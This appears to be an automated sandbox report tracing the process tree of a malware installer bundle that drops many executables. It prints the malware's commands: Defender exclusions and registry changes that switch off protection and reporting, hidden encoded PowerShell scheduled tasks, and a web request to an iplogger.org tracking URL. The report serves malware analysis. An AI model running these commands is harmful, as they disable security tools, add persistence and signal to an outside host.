Explorer.EXEultramediaburner.tmpsetup_2.tmppid process 3040 Explorer.EXE 3040 Explorer.EXE 3040 Explorer.EXE 3040 Explorer.EXE 3040 Explorer.EXE 3040 Explorer.EXE 4952 ultramediaburner.tmp 5652 setup_2.tmp 3040 Explorer.EXE 3040 Explorer.EXE 3040 Explorer.EXE 3040 Explorer.EXE 3040 Explorer.EXE 3040 Explorer.EXE 3040 Explorer.EXE 3040 Explorer.EXE 3040 Explorer.EXE 3040 Explorer.EXE 3040 Explorer.EXE 3040 Explorer.EXE 3040 Explorer.EXE 3040 Explorer.EXE 3040 Explorer.EXE 3040 Explorer.EXE 3040 Explorer.EXE 3040 Explorer.EXE 3040 Explorer.EXE 3040 Explorer.EXE 3040 Explorer.EXE -
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
Explorer.EXEpid process 3040 Explorer.EXE -
Suspicious use of SetWindowsHookEx 9 IoCs
Processes:
Explorer.EXEMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exepid process 3040 Explorer.EXE 9108 MicrosoftEdge.exe 9680 MicrosoftEdgeCP.exe 4556 MicrosoftEdge.exe 7780 MicrosoftEdgeCP.exe 7780 MicrosoftEdgeCP.exe 1320 MicrosoftEdge.exe 7372 MicrosoftEdgeCP.exe 7372 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 4956 wrote to memory of 4988 4956 setup_x86_x64_install.exe setup_installer.exe PID 4956 wrote to memory of 4988 4956 setup_x86_x64_install.exe setup_installer.exe PID 4956 wrote to memory of 4988 4956 setup_x86_x64_install.exe setup_installer.exe PID 4988 wrote to memory of 5088 4988 setup_installer.exe setup_install.exe PID 4988 wrote to memory of 5088 4988 setup_installer.exe setup_install.exe PID 4988 wrote to memory of 5088 4988 setup_installer.exe setup_install.exe PID 5088 wrote to memory of 4024 5088 setup_install.exe cmd.exe PID 5088 wrote to memory of 4024 5088 setup_install.exe cmd.exe PID 5088 wrote to memory of 4024 5088 setup_install.exe cmd.exe PID 5088 wrote to memory of 3332 5088 setup_install.exe cmd.exe PID 5088 wrote to memory of 3332 5088 setup_install.exe cmd.exe PID 5088 wrote to memory of 3332 5088 setup_install.exe cmd.exe PID 5088 wrote to memory of 3400 5088 setup_install.exe cmd.exe PID 5088 wrote to memory of 3400 5088 setup_install.exe cmd.exe PID 5088 wrote to memory of 3400 5088 setup_install.exe cmd.exe PID 5088 wrote to memory of 3568 5088 setup_install.exe cmd.exe PID 5088 wrote to memory of 3568 5088 setup_install.exe cmd.exe PID 5088 wrote to memory of 3568 5088 setup_install.exe cmd.exe PID 5088 wrote to memory of 3728 5088 setup_install.exe cmd.exe PID 5088 wrote to memory of 3728 5088 setup_install.exe cmd.exe PID 5088 wrote to memory of 3728 5088 setup_install.exe cmd.exe PID 5088 wrote to memory of 3596 5088 setup_install.exe cmd.exe PID 5088 wrote to memory of 3596 5088 setup_install.exe cmd.exe PID 5088 wrote to memory of 3596 5088 setup_install.exe cmd.exe PID 5088 wrote to memory of 3764 5088 setup_install.exe cmd.exe PID 5088 wrote to memory of 3764 5088 setup_install.exe cmd.exe PID 5088 wrote to memory of 3764 5088 setup_install.exe cmd.exe PID 5088 wrote to memory of 4400 5088 setup_install.exe cmd.exe PID 5088 wrote to memory of 4400 5088 setup_install.exe cmd.exe PID 5088 wrote to memory of 4400 5088 setup_install.exe cmd.exe PID 5088 wrote to memory of 4412 5088 setup_install.exe cmd.exe PID 5088 wrote to memory of 4412 5088 setup_install.exe cmd.exe PID 5088 wrote to memory of 4412 5088 setup_install.exe cmd.exe PID 5088 wrote to memory of 4432 5088 setup_install.exe cmd.exe PID 5088 wrote to memory of 4432 5088 setup_install.exe cmd.exe PID 5088 wrote to memory of 4432 5088 setup_install.exe cmd.exe PID 4024 wrote to memory of 3024 4024 cmd.exe powershell.exe PID 4024 wrote to memory of 3024 4024 cmd.exe powershell.exe PID 4024 wrote to memory of 3024 4024 cmd.exe powershell.exe PID 5088 wrote to memory of 4128 5088 setup_install.exe cmd.exe PID 5088 wrote to memory of 4128 5088 setup_install.exe cmd.exe PID 5088 wrote to memory of 4128 5088 setup_install.exe cmd.exe PID 3596 wrote to memory of 4108 3596 cmd.exe Sat20873bc74eb80e0.exe PID 3596 wrote to memory of 4108 3596 cmd.exe Sat20873bc74eb80e0.exe PID 3596 wrote to memory of 4108 3596 cmd.exe Sat20873bc74eb80e0.exe PID 5088 wrote to memory of 3692 5088 setup_install.exe cmd.exe PID 5088 wrote to memory of 3692 5088 setup_install.exe cmd.exe PID 5088 wrote to memory of 3692 5088 setup_install.exe cmd.exe PID 3568 wrote to memory of 4444 3568 cmd.exe Sat2071d99516dc03841.exe PID 3568 wrote to memory of 4444 3568 cmd.exe Sat2071d99516dc03841.exe PID 3400 wrote to memory of 3128 3400 cmd.exe Sat20578e6239.exe PID 3400 wrote to memory of 3128 3400 cmd.exe Sat20578e6239.exe PID 3400 wrote to memory of 3128 3400 cmd.exe Sat20578e6239.exe PID 5088 wrote to memory of 3820 5088 setup_install.exe cmd.exe PID 5088 wrote to memory of 3820 5088 setup_install.exe cmd.exe PID 5088 wrote to memory of 3820 5088 setup_install.exe cmd.exe PID 3728 wrote to memory of 3424 3728 cmd.exe Sat20fbae42a4.exe PID 3728 wrote to memory of 3424 3728 cmd.exe Sat20fbae42a4.exe PID 3728 wrote to memory of 3424 3728 cmd.exe Sat20fbae42a4.exe PID 3332 wrote to memory of 1016 3332 cmd.exe Sat20ecdfe3ee79f.exe PID 3332 wrote to memory of 1016 3332 cmd.exe Sat20ecdfe3ee79f.exe PID 3332 wrote to memory of 1016 3332 cmd.exe Sat20ecdfe3ee79f.exe PID 5088 wrote to memory of 1792 5088 setup_install.exe cmd.exe PID 5088 wrote to memory of 1792 5088 setup_install.exe cmd.exe
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R2⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Drops file in Windows directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC7375180\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSC7375180\setup_install.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat20ecdfe3ee79f.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat20ecdfe3ee79f.exeSat20ecdfe3ee79f.exe6⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Documents\8airpAP2vSR1mNtVUpIMLusz.exe"C:\Users\Admin\Documents\8airpAP2vSR1mNtVUpIMLusz.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\9k747JMG7jwW9QQSPMvI1cd9.exe"C:\Users\Admin\Documents\9k747JMG7jwW9QQSPMvI1cd9.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\qMwqayby3LtBSXcMFZn4WENT.exe"C:\Users\Admin\Documents\qMwqayby3LtBSXcMFZn4WENT.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\GM2TDOTFhN_nbC2OoeD2Rg86.exe"C:\Users\Admin\Documents\GM2TDOTFhN_nbC2OoeD2Rg86.exe"7⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"8⤵
- Checks computer location settings
-
C:\Users\Admin\Documents\U8WnVwnNyb2imZ4b_Nih_oJ5.exe"C:\Users\Admin\Documents\U8WnVwnNyb2imZ4b_Nih_oJ5.exe"9⤵
-
C:\Users\Admin\Documents\7HbN9T1cRnpv4wXKr0ap_CS7.exe"C:\Users\Admin\Documents\7HbN9T1cRnpv4wXKr0ap_CS7.exe"9⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS31BB.tmp\Install.exe.\Install.exe10⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS32F3.tmp\Install.exe.\Install.exe /S /site_id "668658"11⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &12⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"13⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True16⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"13⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True16⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"13⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True16⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"13⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True16⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&13⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3214⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6414⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&13⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3214⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6414⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gBcpYIDWL" /SC once /ST 08:56:23 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="12⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gBcpYIDWL"12⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gBcpYIDWL"12⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bRciptYQhTCMvEFWGJ" /SC once /ST 21:31:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\nitzTrLPrXGkZCFFk\iXkrQovqyvDrylo\wjichPy.exe\" W8 /site_id 668658 /S" /V1 /F12⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\cyhXA10eOOPKGx2fm1TIDtyP.exe"C:\Users\Admin\Documents\cyhXA10eOOPKGx2fm1TIDtyP.exe"9⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST8⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST8⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\Yry2f6UscYEHvhxNM_NasvjF.exe"C:\Users\Admin\Documents\Yry2f6UscYEHvhxNM_NasvjF.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5608 -s 9008⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\Documents\wOurEP1Lg22ZZexSGLrzgNTx.exe"C:\Users\Admin\Documents\wOurEP1Lg22ZZexSGLrzgNTx.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5748 -s 6608⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5748 -s 10928⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5748 -s 12368⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "wOurEP1Lg22ZZexSGLrzgNTx.exe" /f & erase "C:\Users\Admin\Documents\wOurEP1Lg22ZZexSGLrzgNTx.exe" & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "wOurEP1Lg22ZZexSGLrzgNTx.exe" /f9⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\3AQleALHNNRtcBTszRyp7hDK.exe"C:\Users\Admin\Documents\3AQleALHNNRtcBTszRyp7hDK.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\QXHofo5pEteva5oWRgeBqUVV.exe"C:\Users\Admin\Documents\QXHofo5pEteva5oWRgeBqUVV.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\gWaq3hqPJ5rZctwz9iAX7kUB.exe"C:\Users\Admin\Documents\gWaq3hqPJ5rZctwz9iAX7kUB.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\gWaq3hqPJ5rZctwz9iAX7kUB.exe"C:\Users\Admin\Documents\gWaq3hqPJ5rZctwz9iAX7kUB.exe"8⤵
- Modifies data under HKEY_USERS
-
C:\Users\Admin\Documents\hJfXrqQQ_Fe0h5fLGBSbNOgz.exe"C:\Users\Admin\Documents\hJfXrqQQ_Fe0h5fLGBSbNOgz.exe"7⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\inst001.exe"C:\Program Files (x86)\Company\NewProduct\inst001.exe"8⤵
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"8⤵
- Checks whether UAC is enabled
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\pDOVOMsZF5WLWhICeZK_Vlir.exe"C:\Users\Admin\Documents\pDOVOMsZF5WLWhICeZK_Vlir.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\OPlg5C44foFtCP1xTsMRcx2L.exe"C:\Users\Admin\Documents\OPlg5C44foFtCP1xTsMRcx2L.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\PPlD8Z0K7d9WUvvAWu1vun4D.exe"C:\Users\Admin\Documents\PPlD8Z0K7d9WUvvAWu1vun4D.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\4x4_z5aLp04hx89ID2XGg6um.exe"C:\Users\Admin\Documents\4x4_z5aLp04hx89ID2XGg6um.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\4x4_z5aLp04hx89ID2XGg6um.exeC:\Users\Admin\Documents\4x4_z5aLp04hx89ID2XGg6um.exe8⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\hKGOBqPQ2CtFcQ7L_yVukhul.exe"C:\Users\Admin\Documents\hKGOBqPQ2CtFcQ7L_yVukhul.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\bRJ06_QbRE9hlrR0l4Zuq2_k.exe"C:\Users\Admin\Documents\bRJ06_QbRE9hlrR0l4Zuq2_k.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c start "" "f.exe" & start "" "wwi.exe" & start "" "wwl.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"8⤵
-
C:\Users\Admin\AppData\Local\Temp\f.exe"f.exe"9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\237843444.exe"C:\Users\Admin\AppData\Local\237843444.exe"10⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\wwi.exe"wwi.exe"9⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"9⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Local\Temp\wwl.exe"wwl.exe"9⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\ALU9NmuUdiXkXK7aVOwsE9z7.exe"C:\Users\Admin\Documents\ALU9NmuUdiXkXK7aVOwsE9z7.exe"7⤵
-
C:\Users\Admin\Documents\ALU9NmuUdiXkXK7aVOwsE9z7.exe"C:\Users\Admin\Documents\ALU9NmuUdiXkXK7aVOwsE9z7.exe"8⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\elADi5yzsqicpvJG5uTkV55y.exe"C:\Users\Admin\Documents\elADi5yzsqicpvJG5uTkV55y.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\I3gaVL3bm1lMtsvde3S141IC.exe"C:\Users\Admin\Documents\I3gaVL3bm1lMtsvde3S141IC.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\xooCDT5mFHxEUzre1uE3Dd61.exe"C:\Users\Admin\Documents\xooCDT5mFHxEUzre1uE3Dd61.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\7038799.scr"C:\Users\Admin\AppData\Roaming\7038799.scr" /S8⤵
-
C:\Users\Admin\AppData\Roaming\7963793.scr"C:\Users\Admin\AppData\Roaming\7963793.scr" /S8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\7048378.scr"C:\Users\Admin\AppData\Roaming\7048378.scr" /S8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat20578e6239.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat20578e6239.exeSat20578e6239.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat2071d99516dc03841.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat2071d99516dc03841.exeSat2071d99516dc03841.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\tmpE781_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpE781_tmp.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\tmpE781_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmpE781_tmp.exe8⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat20fbae42a4.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat20fbae42a4.exeSat20fbae42a4.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat20873bc74eb80e0.exe5⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat20873bc74eb80e0.exeSat20873bc74eb80e0.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat205eb4a2ece877a.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC7375180\Sat205eb4a2ece877a.exeSat205eb4a2ece877a.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"8⤵
-
